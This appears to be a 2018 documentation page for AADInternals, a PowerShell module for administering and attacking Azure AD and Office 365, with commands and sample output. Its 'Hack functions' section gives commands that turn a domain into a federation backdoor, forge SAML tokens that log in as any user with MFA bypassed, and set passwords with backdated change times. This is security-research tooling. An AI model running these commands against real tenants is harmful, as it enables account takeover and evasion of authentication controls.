AAD Internals


AADInternals PowerShell module contains tools for administering and hacking Azure AD and Office 365.


The module can be installed from PowerShell:

Install-Module AADInternals

The module is also available in GitHub https://github.com/Gerenios/AADInternals.


AAD Internals is a PowerShell module where I’ve tried to put all the knowledge I’ve gained during the years spent with Office 365 and Azure AD. It is a result of hours of reverse-engineering and debugging of Microsoft tools related to Azure AD, such as PowerShell modules, directory synchronisation, and admin portals.

The module is a plain PowerShell script module, so you can copy and paste the code to your own scripts as needed. Having said that, the are some functions that are utilising the built-in functionality of Windows. Thus, everything might not work on every computer.

The module is now on early beta, so all comments and ideas are more than welcome. You can comment to this article or post bugs and fixes to GitHub.

I haven’t tried to duplicate all functionality MSOnline or AzureAD modules currently have. Instead, I decided to bring that information and functionality those modules doesn’t provide. Also, I have created some “blackhat” level functionality that allows administrators to do things that shouldn’t be even possible..

Detailed help about parameters etc. can be seen using PowerShell Get-Help cmdlet:

# See help for Get-AADIntAccessTokenForAADGraph
Get-Help Get-AADIntAccessTokenForAADGraph

Version info

Version Date Version notes
0.1.1 Oct 25th 2018 The first beta release.


Playing with access tokens

Most of the functions are using REST APIs which require OAuth access tokens. The AADInternals module is using three types of access tokens:

Token/API Function Remarks
AAD Graph Get-AADIntAccessTokenForAADGraph Functions using AAD Graph access token have a cache, so no need pass it as parameter. If credentials are not passed, will prompt for credentials (supports MFA).
MS Graph Get-AADIntAccessTokenForMSGraph Not used in this version.
Pass Through Authentication Get-AADIntAccessTokenForPTA Used when enabling/disabling PTA.
Azure Admin Portal Get-AADIntAuthTokenForAADIAMAPI Used when inviting guest users.

To get an AAD Graph access token and save it to cache, run the following function. The token will be valid for an hour, after that you need to run the function again.

# Prompt for credentials and retrieve & store access token to cache

Information Functions

Information functions are functions that can be used to retrieve information about users, tenants, and Office 365. Functions marked with * doesn’t need authentication. Functions marked with A uses AAD Graph access token.

Get-AADIntLoginInformation (*)

This function returns login information for the given user (or domain).


# Get login information for a domain
Get-AADIntLoginInformation -Domain company.com


Federation Protocol                  : WSTrust
Pref Credential                      : 4
Consumer Domain                      : 
Cloud Instance audience urn          : urn:federation:MicrosoftOnline
Authentication Url                   : https://msft.sts.microsoft.com/adfs/ls/?username=nn%40microsoft.com&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx=
Throttle Status                      : 1
Account Type                         : Federated
Has Password                         : True
Federation Active Authentication Url : https://msft.sts.microsoft.com/adfs/services/trust/2005/usernamemixed
Exists                               : 0
Federation Metadata Url              : https://msft.sts.microsoft.com/adfs/services/trust/mex
Desktop Sso Enabled                  : 
Tenant Banner Logo                   : 
Tenant Locale                        : 
Cloud Instance                       : microsoftonline.com
State                                : 3
Domain Type                          : 4
Domain Name                          : microsoft.com
Tenant Banner Illustration           : 
Federation Brand Name                : Microsoft
Federation Global Version            : -1
User State                           : 2

Get-AADIntEndpointInstances (*)

This function returns Office 365 instances and information when the latest changes have been made (e.g. ips & urls).


# Get Office 365 instances


instance     latest    
--------     ------    
Worldwide    2018100100
USGovDoD     2018100100
USGovGCCHigh 2018100100
China        2018100100
Germany      2018100100

Get-AADIntEndpointIps (*)

This function returns Office 365 ip addresses and urls for the given instance. The information can be used to create firewall rules.


# Get ips and urls for "normal" Office 365
Get-AADIntEndpointIps -Instance WorldWide


id                     : 1
serviceArea            : Exchange
serviceAreaDisplayName : Exchange Online
urls                   : {outlook.office.com, outlook.office365.com}
ips                    : {,,,}
tcpPorts               : 80,443
expressRoute           : True
category               : Optimize
required               : True

id                     : 2
serviceArea            : Exchange
serviceAreaDisplayName : Exchange Online
urls                   : {smtp.office365.com}
ips                    : {,,,}
tcpPorts               : 587
expressRoute           : True
category               : Allow
required               : True

Get-AADIntTenantDetails (A)

This function returns details for the given tenant.


# Get tenant details


odata.type                           : Microsoft.DirectoryServices.TenantDetail
objectType                           : Company
objectId                             : e21e0e8c-d2ed-4edf-aa91-937963949cdc
deletionTimestamp                    : 
assignedPlans                        : ..
city                                 : 
companyLastDirSyncTime               : 2018-10-25T12:53:43Z
country                              : 
countryLetterCode                    : FI
dirSyncEnabled                       : True
displayName                          : Company Ltd
marketingNotificationEmails          : {}
postalCode                           : 
preferredLanguage                    : en
privacyProfile                       : 
provisionedPlans                     : ..
provisioningErrors                   : {}
securityComplianceNotificationMails  : {}
securityComplianceNotificationPhones : {}
state                                : 
street                               : 
technicalNotificationMails           : {user@alt.none}
telephoneNumber                      : 123456789
verifiedDomains                      : ..

Get-AADIntServiceLocations (A)

This function shows the tenant’s true service locations.


# Get service location information of the tenant
Get-AADIntServiceLocations | Format-Table


Region Instance             Name                          State Country
------ --------             ----                          ----- -------
EU     EU001                PowerBI                             IR     
EU     PROD_MSUB01_02       SCO                                 IE     
NA     NA001                MultiFactorService                  US     
NA     NA001                AzureAdvancedThreatAnalytics        US     
EU     Prod04               Adallom                             GB     
NA     NA001                AADPremiumService                   US     
EU     EURP191-001-01       exchange                            IE     
NA     NA003                YammerEnterprise                    US     
NA     NA001                To-Do                               US     
NA     NA001                TeamspaceAPI                        US     
NA     NA001                Sway                                US     
EU     SPOS1196             SharePoint                          NL     
EU     EU                   RMSOnline                           NL     
EU     PROD_EU_Org_Ring_152 ProjectWorkManagement               NL     
NA     NA001                ProcessSimple                       US     
NA     NA001                PowerAppsService                    US     
NA     NA001                OfficeForms                         US     
NA     NA001                MicrosoftStream                     US     
NA     NorthAmerica1        MicrosoftOffice                     US     
EU     EMEA-2E-S3           MicrosoftCommunicationsOnline       NL     
EU     emea05-01            ExchangeOnlineProtection            NL     
NA     NA001                Deskless                            US     
NA     NA002                SMIT                                US     
NA     NA001                Metro                               US     
EU     EU003                DirectoryToCosmos                   GB     
NA     *                    BecWSClients                        US     
NA     NA033                BDM                                 US     
EU     EUGB02               AadAllTenantsNotifications          GB

Get-AADIntServicePlans (A)

This function returns information about tenant’s service plans, such as name, id, status, and when first assigned.


# Get the service plans of the tenant
Get-AADIntServicePlans | Format-Table


SKU               ServicePlanId                        ServiceName           ServiceType                   AssignedTimestamp    CapabilityStatus ProvisioningStatus
---               -------------                        -----------           -----------                   -----------------    ---------------- ------------------
ENTERPRISEPREMIUM b1188c4c-1b36-4018-b48b-ee07604f6feb PAM_ENTERPRISE        Exchange                      2018-09-27T15:47:45Z Enabled          Success           
                  76846ad7-7776-4c40-a281-a386362dd1b9                       ProcessSimple                 2018-09-27T15:47:25Z Deleted                            
                  c87f142c-d1e9-4363-8630-aaea9c4d9ae5                       To-Do                         2018-09-27T15:47:24Z Deleted                            
                  c68f8d98-5534-41c8-bf36-22fa496fa792                       PowerAppsService              2018-09-27T15:47:25Z Deleted                            
                  9e700747-8b1d-45e5-ab8d-ef187ceec156                       MicrosoftStream               2018-09-27T15:47:25Z Deleted                            
                  2789c901-c14e-48ab-a76a-be334d9d793a                       OfficeForms                   2018-09-27T15:47:25Z Deleted                            
ENTERPRISEPREMIUM 9f431833-0334-42de-a7dc-70aa40db46db LOCKBOX_ENTERPRISE    Exchange                      2018-08-27T05:46:50Z Enabled          Success           
ENTERPRISEPREMIUM 3fb82609-8c27-4f7b-bd51-30634711ee67 BPOS_S_TODO_3         To-Do                         2018-08-27T05:46:50Z Enabled          Success           
ENTERPRISEPREMIUM 7547a3fe-08ee-4ccb-b430-5077c5041653 YAMMER_ENTERPRISE     YammerEnterprise              2018-08-27T05:46:51Z Enabled          Success           
ENTERPRISEPREMIUM 8e0c0a52-6a6c-4d40-8370-dd62790dcd70 THREAT_INTELLIGENCE   Exchange                      2018-08-27T05:46:50Z Enabled          Success           
ENTERPRISEPREMIUM 9c0dab89-a30c-4117-86e7-97bda240acd2 POWERAPPS_O365_P3     PowerAppsService              2018-08-27T05:46:50Z Enabled          Success           
ENTERPRISEPREMIUM b737dad2-2f6c-4c65-90e3-ca563267e8b9 PROJECTWORKMANAGEMENT ProjectWorkManagement         2018-08-27T05:46:51Z Enabled          Success           
ENTERPRISEPREMIUM 5dbe027f-2339-4123-9542-606e4d348a72 SHAREPOINTENTERPRISE  SharePoint                    2018-08-27T05:46:51Z Enabled          Success           
ENTERPRISEPREMIUM 8c098270-9dd4-4350-9b30-ba4703f3b36b ADALLOM_S_O365        Adallom                       2018-08-27T05:46:50Z Enabled          Success           
ENTERPRISEPREMIUM 6c6042f5-6f01-4d67-b8c1-eb99d36eed3e STREAM_O365_E5        MicrosoftStream               2018-08-27T05:46:50Z Enabled          Success           
ENTERPRISEPREMIUM 07699545-9485-468e-95b6-2fca3738be01 FLOW_O365_P3          ProcessSimple                 2018-08-27T05:46:50Z Enabled          Success           
ENTERPRISEPREMIUM 4de31727-a228-4ec3-a5bf-8e45b5ca48cc EQUIVIO_ANALYTICS     Exchange                      2018-08-27T05:46:50Z Enabled          Success           
ENTERPRISEPREMIUM 0feaeb32-d00e-4d66-bd5a-43b5b83db82c MCOSTANDARD           MicrosoftCommunicationsOnline 2018-08-27T05:46:51Z Enabled          Success           
ENTERPRISEPREMIUM 70d33638-9c74-4d01-bfd3-562de28bd4ba BI_AZURE_P2           PowerBI                       2018-08-27T05:46:51Z Enabled          Success           
ENTERPRISEPREMIUM 43de0ff5-c92c-492b-9116-175376d08c38 OFFICESUBSCRIPTION    MicrosoftOffice               2018-08-27T05:46:51Z Enabled          Success           
ENTERPRISEPREMIUM 3e26ee1f-8a5f-4d52-aee2-b81ce45c8f40 MCOMEETADV            MicrosoftCommunicationsOnline 2018-08-27T05:46:51Z Enabled          Success           
ENTERPRISEPREMIUM e95bec33-7c88-4a70-8e19-b10bd9d0c014 SHAREPOINTWAC         SharePoint                    2018-08-27T05:46:51Z Enabled          Success           
ENTERPRISEPREMIUM 8c7d2df8-86f0-4902-b2ed-a0458298f3b3 Deskless              Deskless                      2018-08-27T05:46:50Z Enabled          Success           
ENTERPRISEPREMIUM 57ff2da0-773e-42df-b2af-ffb7a2317929 TEAMS1                TeamspaceAPI                  2018-08-27T05:46:50Z Enabled          Success           
ENTERPRISEPREMIUM 4828c8ec-dc2e-4779-b502-87ac9ce28ab7 MCOEV                 MicrosoftCommunicationsOnline 2018-08-27T05:46:51Z Enabled          Success           
ENTERPRISEPREMIUM 34c0d7a0-a70f-4668-9238-47f9fc208882 EXCHANGE_ANALYTICS    Exchange                      2018-08-27T05:46:50Z Enabled          Success           
ENTERPRISEPREMIUM f20fedf3-f3c3-43c3-8267-2bfdd51c0939 ATP_ENTERPRISE        Exchange                      2018-08-27T05:46:51Z Enabled          Success           
ENTERPRISEPREMIUM efb87545-963c-4e0d-99df-69c6916d9eb0 EXCHANGE_S_ENTERPRISE Exchange                      2018-08-27T05:46:51Z Enabled          Success           
ENTERPRISEPREMIUM e212cbc7-0961-4c40-9825-01117710dcb1 FORMS_PLAN_E5         OfficeForms                   2018-08-27T05:46:50Z Enabled          Success           
ENTERPRISEPREMIUM a23b959c-7ce8-4e57-9140-b90eb88a9e97 SWAY                  Sway                          2018-08-27T05:46:51Z Enabled          Success           
EMSPREMIUM        113feb6c-3fe4-4440-bddc-54d774bf0318 EXCHANGE_S_FOUNDATION Exchange                      2018-08-13T10:17:31Z Enabled          Success           
EMSPREMIUM        eec0eb4f-6444-4f95-aba0-50c24d67f998 AAD_PREMIUM_P2        AADPremiumService             2018-08-13T10:17:33Z Enabled          Success           
EMSPREMIUM        c1ec4a95-1f05-45b3-a911-aa3fa01094f5 INTUNE_A              SCO                           2018-08-13T10:17:32Z Enabled          Success           
EMSPREMIUM        2e2ddb96-6af9-4b1d-a3f0-d6ecfd22edb2 ADALLOM_S_STANDALONE  Adallom                       2018-08-13T10:17:31Z Enabled          Success           
EMSPREMIUM        6c57d4b6-3b23-47a5-9bc9-69f17b4947b3 RMS_S_PREMIUM         RMSOnline                     2018-08-13T10:17:32Z Enabled          Success           
EMSPREMIUM        41781fb2-bc02-4b7c-bd55-b576c07bb09d AAD_PREMIUM           AADPremiumService             2018-08-13T10:17:34Z Enabled          Success           
EMSPREMIUM        14ab5db5-e6c4-4b20-b4bc-13e36fd2227f ATA                   AzureAdvancedThreatAnalytics  2018-08-13T10:17:31Z Enabled          Success           
EMSPREMIUM        8a256a2b-b617-496d-b51b-e76466e88db0 MFA_PREMIUM           MultiFactorService            2018-08-13T10:17:33Z Enabled          Success           
EMSPREMIUM        5689bec4-755d-4753-8b61-40975025187c RMS_S_PREMIUM2        RMSOnline                     2018-08-13T10:17:31Z Enabled          Success           
ENTERPRISEPREMIUM 882e1d05-acd1-4ccb-8708-6ee03664b117 INTUNE_O365           SCO                           2018-07-26T15:47:50Z Deleted          PendingActivation 
EMSPREMIUM        bea4c11e-220a-4e6d-8eb8-8ea15d019f90 RMS_S_ENTERPRISE      RMSOnline                     2018-06-26T10:47:37Z Enabled          Success

Get-AADIntSubscriptions (A)

This function returns tenant’s subscription details, such as name, id, number of licenses, and when created.


# Get subscriptions of the tenant


SkuPartNumber     WarningUnits TotalLicenses IsTrial NextLifecycleDate    OcpSubscriptionId                    ConsumedUnits ObjectId                             SkuId                                DateCreated         
-------------     ------------ ------------- ------- -----------------    -----------------                    ------------- --------                             -----                                -----------         
EMSPREMIUM        0            250           true    2018-11-13T00:00:00Z 76909010-12ed-4b05-b3d7-ee1b42c21b4e 21            58265dbe-24e0-4cdb-8b62-51197a4c1c13 b05e124f-c7cc-45a0-a6aa-8cf78c946968 2018-08-13T00:00:00Z
ENTERPRISEPREMIUM 25           25            true    2018-10-27T15:47:40Z 7c206b83-2487-49fa-b91e-3d676de02ccb 21            df58544b-5062-4d6c-85de-937f203bbe0f c7df2760-2c81-4ef7-b578-5b5392b571df 2018-08-27T00:00:00Z

Get-AADIntSPOServiceInformation (A)

This function returns details of tenant’s SharePoint Online instance, such as when created and last modified.


# Get SharePoint Online information

Output: (sorted for clarity)

CreatedOn                               : 6/26/2018 11:16:12 AM
EnableOneDriveforSuiteUsers             : False
InstanceId                              : 44f5a625-f90e-4916-b8ab-ec45d38bdbb6
LastModifiedOn                          : 10/25/2018 7:37:38 AM
OfficeGraphUrl                          : https://company-my.sharepoint.com/_layouts/15/me.aspx
RootAdminUrl                            : https://company-admin.sharepoint.com/
RootIWSPOUrl                            : https://company-my.sharepoint.com/
SPO_LegacyPublicWebSiteEditPage         : Pages/Forms/AllItems.aspx
SPO_LegacyPublicWebSitePublicUrl        : 
SPO_LegacyPublicWebSiteUrl              : 
SPO_MySiteHostUrl                       : https://company-my.sharepoint.com/
SPO_MySiteHost_AboutMeUrl               : https://company-my.sharepoint.com/person.aspx
SPO_MySiteHost_DocumentsUrl             : https://company-my.sharepoint.com/_layouts/15/MySite.aspx?MySiteRedirect=AllDocuments
SPO_MySiteHost_NewsFeedUrl              : https://company-my.sharepoint.com/default.aspx
SPO_MySiteHost_ProjectSiteUrl           : https://company-my.sharepoint.com/_layouts/15/MyProjects.aspx
SPO_MySiteHost_SitesUrl                 : https://company-my.sharepoint.com/_layouts/15/MySite.aspx?MySiteRedirect=AllSites
SPO_PublicWebSitePublicUrl              : 
SPO_PublicWebSiteUrl                    : NotSupported
SPO_RegionalRootSiteUrl                 : https://company.sharepoint.com/
SPO_RootSiteUrl                         : https://company.sharepoint.com/
SPO_TenantAdminUrl                      : https://company-admin.sharepoint.com/
SPO_TenantAdmin_CreateSiteCollectionUrl : https://company-admin.sharepoint.com/_layouts/15/online/CreateSiteFull.aspx
SPO_TenantAdmin_ProjectAdminUrl         : https://company-admin.sharepoint.com/
SPO_TenantAdmin_ViewSiteCollectionsUrl  : https://company-admin.sharepoint.com/
SPO_TenantUpgradeUrl                    : https://company-admin.sharepoint.com/
ServiceInformation_LastChangeDate       : 10/25/2018 7:37:22 AM
ShowSites_InitialVisibility             : True
ShowSkyDrivePro_InitialVisibility       : True
ShowYammerNewsFeed_InitialVisibility    : True
VideoPortalServerRelativeUrl            : /portals/hub/_layouts/15/videohome.aspx

Get-AADIntCompanyInformation (A)

This function returns details about tenant’s company information. Pretty much same functionality than Get-MsolCompanyInformation cmdlet.


# Get company information of the tenant


AllowAdHocSubscriptions                  : false
AllowEmailVerifiedUsers                  : false
AuthorizedServiceInstances               : AuthorizedServiceInstances
AuthorizedServices                       : 
City                                     : 
CompanyDeletionStartTime                 : 
CompanyTags                              : CompanyTags
CompanyType                              : CompanyTenant
CompassEnabled                           : 
Country                                  : 
CountryLetterCode                        : GB
DapEnabled                               : 
DefaultUsageLocation                     : 
DirSyncAnchorAttribute                   : 
DirSyncApplicationType                   : 1651564e-7ce4-4d99-88be-0a65050d8dc3
DirSyncClientMachineName                 : SERVER2016
DirSyncClientVersion                     : 1.1.882.0
DirSyncServiceAccount                    : Sync_SERVER2016_acf4f37725ce@company.onmicrosoft.com
DirectorySynchronizationEnabled          : true
DirectorySynchronizationStatus           : Enabled
DisplayName                              : Company Ltd
InitialDomain                            : company.onmicrosoft.com
LastDirSyncTime                          : 2018-10-25T13:53:46Z
LastPasswordSyncTime                     : 2018-10-25T14:03:01Z
MarketingNotificationEmails              : 
MultipleDataLocationsForServicesEnabled  : 
ObjectId                                 : 6c1a3ac3-5416-4dd0-984e-228cc80dbc9f
PasswordSynchronizationEnabled           : true
PortalSettings                           : PortalSettings
PostalCode                               : 
PreferredLanguage                        : en
ReleaseTrack                             : StagedRollout
ReplicationScope                         : EU
RmsViralSignUpEnabled                    : false
SecurityComplianceNotificationEmails     : 
SecurityComplianceNotificationPhones     : 
SelfServePasswordResetEnabled            : false
ServiceInformation                       : ServiceInformation
ServiceInstanceInformation               : ServiceInstanceInformation
State                                    : 
Street                                   : 
SubscriptionProvisioningLimited          : false
TechnicalNotificationEmails              : TechnicalNotificationEmails
TelephoneNumber                          : 123456789
UIExtensibilityUris                      : 
UsersPermissionToCreateGroupsEnabled     : false
UsersPermissionToCreateLOBAppsEnabled    : false
UsersPermissionToReadOtherUsersEnabled   : true
UsersPermissionToUserConsentToAppEnabled : false

Get-AADIntCompanyTags (A)

This function returns tags attached to the tenant. Microsoft uses these to identity the status of certain changes, such as SharePoint version update.


# Get login information for a domain
Get-AADIntLoginInformation -Domain company.com



Get-AADIntSyncConfiguration (A)

This function returns synchronisation details.


# Get login information for a domain


TresholdCount                           : 501
UserContainer                           : 
TenantId                                : 6c1a3ac3-5416-4dd0-984e-228cc80dbc9f
ApplicationVersion                      : 1651564e-7ce4-4d99-88be-0a65050d8dc3
DisplayName                             : Company Ltd
IsPasswordSyncing                       : true
AllowedFeatures                         : {ObjectWriteback,  , PasswordWriteback}
PreventAccidentalDeletion               : EnabledForCount
TotalConnectorSpaceObjects              : 15
MaxLinksSupportedAcrossBatchInProvision : 15000
UnifiedGroupContainer                   : 
IsTrackingChanges                       : false
ClientVersion                           : 1.1.882.0
DirSyncFeatures                         : 41021
SynchronizationInterval                 : PT30M
AnchorAttribute                         : 
DirSyncClientMachine                    : SERVER2016
IsDirSyncing                            : true
TresholdPercentage                      : 0


Utilities provide the functionality for troubleshooting and so.

Read-AADIntAccesstoken (*)

This function show access (and id and refresh) token information. For debugging, the most important values are the audience (aud) and the issuer (iss).

You can also show details from the token copied from the browser session’s authorization -header.


# Show access token information
$at = Get-AADIntAccessTokenForAADGraph
Read-AADIntAccesstoken $at


aud                 : https://graph.windows.net
iss                 : https://sts.windows.net/fe177079-66f4-4f9f-bcb6-e085b92e3c8a/
iat                 : 1540478026
nbf                 : 1540478026
exp                 : 1540481926
acr                 : 1
aio                 : ASQA2/8JAAAAXhS3vMo2OGlXvBZG0tScm9njsJUDhvoHtwdSlUx2Jvg=
amr                 : {pwd}
appid               : 1b730954-1685-4b74-9bfd-dac224a7b894
appidacr            : 0
family_name         : demo
given_name          : admin
ipaddr              :
name                : admin demo
oid                 : 69be7da7-e29f-4753-b8c7-0417a63a1804
puid                : 1003BFFDABE606EE
scp                 : user_impersonation
sub                 : SaN7kFxdXhzQN6B7C8ThGEg4gBIrcXo3lzcayeoReps
tenant_region_scope : EU
tid                 : 6217f557-602d-4fc8-b2f9-5cb948f6ce26
unique_name         : admin@company.onmicrosoft.com
upn                 : admin@company.onmicrosoft.com
uti                 : bH3Bzy9D5ESLcW_S0KkoAA
ver                 : 1.0

Get-AADIntCertificate (*)

This function loads certificate from a .pfx file to a variable. Used to create SAML tokens.


# Get login information for a domain
$cert = Get-AADIntCertificate -FileName 'C:\temp\cert.pfx' -Password 'mypassword'


Thumbprint                                Subject                                                                                                                                                                                                    
----------                                -------                                                                                                                                                                                                    
7fb507489addeee4dff2f64c68d1970c28b0da62  CN=sign.company.com, O=Company, S=Alaska, C=US

Get-AADIntImmutableID (*)

This function returns ImmutableId for the given ADUser -object. Must be run on a computer having ActiveDirectory -module


# Get ImmutableId for a ADUser
$user=Get-ADUser "myuser"



User manipulation

User manipulation functions provide the basic user adding/editing/deleting functionality and some extras.

Get-AADIntUsers (A)

This function returns users of the tenant.


# Get users
Get-AADIntUsers | Select UserPrincipalName,ObjectId,ImmutableId


UserPrincipalName                                               ObjectId                             ImmutableId             
-----------------                                               --------                             -----------  
LeeG@company.com                                                2eee0a36-9e2f-4985-80e1-4172ed8b3213 7jYndBUFCEqlXQNZEO3uwQ==
LidiaH@company.com                                              34289155-2798-432d-9398-53e7e0918f38 W3clIieLs0ivUeoY1lu1fg==
AllanD@company.com                                              3a0eea57-9f74-4ee5-8e84-353c35581cc2 BzPotuy3G0ySBJN5tZwB4w==

Get-AADIntUser (A)

This function returns information for the given user.


# Get user information


AlternateEmailAddresses                : 
AlternateMobilePhones                  : 
AlternativeSecurityIds                 : 
BlockCredential                        : false
City                                   : 
CloudExchangeRecipientDisplayType      : 1073741824
Country                                : 
Department                             : Manufacturing
DirSyncProvisioningErrors              : 
DisplayName                            : Lee Gu
Errors                                 : 
Fax                                    : 
FirstName                              : Lee
ImmutableId                            : 7jYndBUFCEqlXQNZEO3uwQ==
IndirectLicenseErrors                  : 
IsBlackberryUser                       : false
IsLicensed                             : true
LastDirSyncTime                        : 2018-06-26T11:04:16Z
LastName                               : Gu
LastPasswordChangeTimestamp            : 2017-10-03T04:44:43Z
LicenseAssignmentDetails               : LicenseAssignmentDetails
LicenseReconciliationNeeded            : false
Licenses                               : Licenses
LiveId                                 : 1003BFFDABE61DB7
MSExchRecipientTypeDetails             : 
MSRtcSipDeploymentLocator              : 
MSRtcSipPrimaryUserAddress             : 
MobilePhone                            : 
OathTokenMetadata                      : 
ObjectId                               : 2eee0a36-9e2f-4985-80e1-4172ed8b3213
Office                                 : 23/3101
OverallProvisioningStatus              : PendingInput
PasswordNeverExpires                   : true
PasswordResetNotRequiredDuringActivate : true
PhoneNumber                            : +1 913 555 0101
PortalSettings                         : 
PostalCode                             : 66210
PreferredDataLocation                  : 
PreferredLanguage                      : 
ProxyAddresses                         : ProxyAddresses
ReleaseTrack                           : 
ServiceInformation                     : 
SignInName                             : LeeG@company.com
SoftDeletionTimestamp                  : 
State                                  : KS
StreetAddress                          : 10801 Mastin Blvd., Suite 620
StrongAuthenticationMethods            : 
StrongAuthenticationPhoneAppDetails    : 
StrongAuthenticationProofupTime        : 
StrongAuthenticationRequirements       : 
StrongAuthenticationUserDetails        : 
StrongPasswordRequired                 : true
StsRefreshTokensValidFrom              : 2017-10-03T04:44:43Z
Title                                  : Director
UsageLocation                          : FI
UserLandingPageIdentifierForO365Shell  : 
UserPrincipalName                      : LeeG@company.com
UserThemeIdentifierForO365Shell        : 
UserType                               : Member
ValidationStatus                       : Healthy
WhenCreated                            : 2018-06-26T11:04:14Z

New-AADIntUser (A)

This function creates a new user. Currently supports only UserPrincipalName and DisplayName.


# Get login information for a domain
New-AADIntUser -UserPrincipalName user@company.com -DisplayName "New User"


AlternateEmailAddresses                : 
AlternateMobilePhones                  : 
AlternativeSecurityIds                 : 
BlockCredential                        : false
City                                   : 
CloudExchangeRecipientDisplayType      : 
Country                                : 
Department                             : 
DirSyncProvisioningErrors              : 
DisplayName                            : New User
Errors                                 : 
Fax                                    : 
FirstName                              : 
ImmutableId                            : 
IndirectLicenseErrors                  : 
IsBlackberryUser                       : false
IsLicensed                             : false
LastDirSyncTime                        : 
LastName                               : 
LastPasswordChangeTimestamp            : 2018-10-25T15:13:10.8686574Z
LicenseAssignmentDetails               : 
LicenseReconciliationNeeded            : false
Licenses                               : 
LiveId                                 : 1003BFFDAEE167C0
MSExchRecipientTypeDetails             : 
MSRtcSipDeploymentLocator              : 
MSRtcSipPrimaryUserAddress             : 
MobilePhone                            : 
OathTokenMetadata                      : 
ObjectId                               : 13e121db-4132-43c8-a784-a9b12f2bd4e3
Office                                 : 
OverallProvisioningStatus              : None
PasswordNeverExpires                   : false
PasswordResetNotRequiredDuringActivate : 
PhoneNumber                            : 
PortalSettings                         : 
PostalCode                             : 
PreferredDataLocation                  : 
PreferredLanguage                      : 
ProxyAddresses                         : 
ReleaseTrack                           : 
ServiceInformation                     : 
SignInName                             : new.user@company.com
SoftDeletionTimestamp                  : 
State                                  : 
StreetAddress                          : 
StrongAuthenticationMethods            : 
StrongAuthenticationPhoneAppDetails    : 
StrongAuthenticationProofupTime        : 
StrongAuthenticationRequirements       : 
StrongAuthenticationUserDetails        : 
StrongPasswordRequired                 : true
StsRefreshTokensValidFrom              : 2018-10-25T15:13:10.8686574Z
Title                                  : 
UsageLocation                          : 
UserLandingPageIdentifierForO365Shell  : 
UserPrincipalName                      : new.user@company.com
UserThemeIdentifierForO365Shell        : 
UserType                               : Member
ValidationStatus                       : Healthy
WhenCreated                            : 
Password                               : Tog59451

Set-AADIntUser (A)

This function changes user’s information.


# Set user information
Set-AADIntUser -UserPrincipalName user@company.com -FirstName "Dave"

Remove-AADIntUser (A)

This function removes a user.


# Remove the user
Remove-AADIntUser -UserPrincipalName user@company.com

Get-AADIntGlobalAdmins (A)

This function returns all Global Admins of the tenant.


# Get global admins


DisplayName    UserPrincipalName                 
-----------    -----------------                 
admin demo     admin@company.onmicrosoft.com
Dave the Admin dave@company.com            

User manipulation with AD sync api

These functions provide some functionality allowing manipulation of Azure AD objects otherwise impossible.

NOTE! these function uses Azure AD synchronization API and may cause severe harm to the tenant!! USE ON YOUR OWN RISK!

Get-AADIntSyncObjects (A)

This function returns all Azure AD objects that are not synced to the on-premises AD.


# Get synchronisable objects from AAD
Get-AADIntSyncObjects | Select UserPrincipalName



Set-AADIntAzureADObject (A)

This function creates new OR modifies existing Azure AD object.

Allows setting all Azure AD attributes. The sourceAnchor attribute is the most important one and is automatically set only to synced users. This is typically the ImmutableID (Base64 encoded on-prem AD object’s GUID), but can be any string that is unique tenant wide.


# Create a new user
Set-AADIntAzureADObject -userPrincipalName "someone@company.com" -sourceAnchor "ABC" -netBiosName


CloudAnchor            : User_d14f7322-c997-4e87-912b-f43c906cec81
ErrorDetails           : ErrorDetails
ObjectType             : User
ResultCode             : Success
ResultErrorCode        : 0
ResultErrorDescription : ResultErrorDescription
SourceAnchor           : ABC
SyncOperation          : Add

Remove-AADIntAzureADObject (A)

This function removes an AAD object.


# Remove AAD object
Remove-AADIntAzureADObject -sourceAnchor ABC


CloudAnchor            : User_d14f7322-c997-4e87-912b-f43c906cec81
ErrorDetails           : ErrorDetails
ObjectType             : User
ResultCode             : Success
ResultErrorCode        : 0
ResultErrorDescription : ResultErrorDescription
SourceAnchor           : ABC
SyncOperation          : Add

Set-AADIntUserPassword (A)

This function sets the user’s password. Also the last change time can be set, must be before the current time.


# Set the password and the change date to 1/1/1970
Set-AADIntUserPassword -SourceAnchor qIMPTm2Q3kimHgg4KQyveA== -Password "a" -ChangeDate 1/1/1970

Output: (Result 0 = success)

CloudAnchor Result SourceAnchor            
----------- ------ ------------            
CloudAnchor 0      qIMPTm2Q3kimHgg4KQyveA==

Reset-AADIntServiceAccount (A)

This function creates a new service account (or reset the password for existing one). The created user will have DirectorySynchronizationAccount role.

Azure AD Connect uses this during the configuration stage to create the service account and stores the username and password to the configuration database.


# Create a new service account for AD sync
Reset-AADIntServiceAccount -ServiceAccount Sync_MyServer_nnnnnnn


Password         UserName                                          
--------         --------                                          
5(]lCy=Q{.#@lb}p Sync_MyServer_nnnnnnn@company.onmicrosoft.com

Hack functions

Hack functions are used to hack Azure AD and Office 365. These functions are exploiting known and not so known AAD features.


Set-AADIntDomainAuthentication (A)

Sets authentication method of the domain. Same functionality than Set-MsolDomainAuthentication cmdlet.


# Set authentication method to managed
Set-AADIntDomainAuthentication -DomainName company.com -Authentication Managed

ConvertTo-AADIntBackdoor (A)

This function converts the given domain to “backdoor”, which can be used to login to the tenant as any user. See Open-AADIntOffice365Portal to use the backdoor.

This exploits a vulnerability I discovered in late 2017. Technically, domain authentication type is set to Federated and configured to trust to the specific certificate (any.sts) and issuer. You can get a free domain from www.myo365.site.


# Convert the domain to backdoor
ConvertTo-AADIntBackdoor -DomainName company.myo365.site


Backdoor created. Domain: company.myo365.site, issuer=http://sts.0nmicrosoft.com/b7d61fa9-afb3-4911-a2e8-8a9f2680a1ed

Open-AADIntOffice365Portal (*)

This function creates a fake (but valid) WS-Fed/SAML authentication token in .html file and opens it in Internet Explorer in private mode. Use any ImmutableId from any user from your tenant and the issuer “http://sts.0nmicrosoft.com/” you created with ConvertTo-AADIntBackdoor.

Internet Explorer should log in automatically unless security settings doesn’t allow that. If that happens, just click Allow blocked content or the button Login to Office 365 and you’re done! From there, you can also browse to https://portal.azure.com as the same user you just logged in.


# Login as anyone
Open-AADIntOffice365Portal -ImmutableID qIMPTm2Q3kimHgg4KQyveA== -Issuer "http://sts.0nmicrosoft.com/b7d61fa9-afb3-4911-a2e8-8a9f2680a1ed" -UseBuiltInCertificate -ByPassMFA $true

Output: (security alert) aadint

Set-AADIntPassThroughAuthentication (P)

This function enables or disabled pass through authentication (PTA).


# Prompt for credentials and store the token
$pt=Get-AADIntAccessTokenForPTA -Credentials (Get-Credential)
# Disable PTA
